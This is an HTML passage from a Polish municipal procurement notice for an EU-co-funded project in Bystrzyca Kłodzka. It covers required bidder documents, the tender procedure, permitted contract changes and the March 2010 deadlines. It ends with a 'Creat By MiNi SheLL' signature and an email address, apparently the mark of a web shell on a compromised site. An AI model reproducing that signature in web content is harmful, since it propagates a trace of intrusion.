<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie złożone na podstawie art. 44 ustawy P.z.p., że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy P.z.p.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Warunki zmiany terminu wykonania zamówienia:
a) z powodu istotnych braków lub błędów w dokumentacji projektowej, polegających 
na niezgodności dokumentacji z przepisami prawa.
b) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia 
proponowanych przez Zamawiającego, jeżeli te zmiany są korzystne dla Zamawiającego 
i wyraża na to zgodę Dolnośląski Wojewódzki Konserwator Zabytków.
c) z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem 
umowy przez doświadczonego Wykonawcę, robót.
d) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego 
przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, 
w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego 
powstaniem szkody w znacznych rozmiarach.
e) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania 
nie są konsekwencją winy którejkolwiek ze stron umowy.

Powyższe zmiany terminu wykonania zamówienia mogą nastąpić wówczas, jeżeli Zamawiający uzyska na powyższe zgodę Instytucji Zarządzającej Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego.



2. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają 
niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu 
budowy.

3. Zamawiający dopuszcza możliwość zmiany w zawartej umowie w części dotyczącej zmiany kluczowego personelu Wykonawcy lub Zamawiającego. 
3.1. W przypadku zmiany kluczowego specjalisty przedstawionego w ofercie, nowy specjalista musi spełniać wymagania określone w SIWZ dla danego specjalisty. 4.2. Zamawiający może żądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
3.3. Zgodnie z żądaniem Zamawiającego Wykonawca zobowiązany jest zmienić kluczowego specjalistę w terminie wskazanym przez Zamawiającego.

3.4. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży            w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. Zamawiający w tym przypadku może od umowy odstąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim Wykonawca może żądać jedynie wynagrodzenia w formie pieniężnej należnego mu z tytułu wykonania części umowy do momentu odstąpienia od umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-bystrzycaklodzka.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Bystrzycy Kłodzkiej, ul. Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, pok. Nr 22 lub 21 w godz.: 7:30 - 15:30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 11:00, miejsce: Urząd Miasta i Gminy w Bystrzycy Kłodzkiej, ul. Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, pokój nr 9 (Sekretariat). Otwarcie ofert nastąpi 10.03.1010 r. w UMiG w By-cy Kł. w pok. Nr 12, o godz. 11:30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie to współfinansowane jest 
z Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007 - 2013, priorytet nr 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i Kultura) Działania nr 6.1 Turystyka uzdrowiskowa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com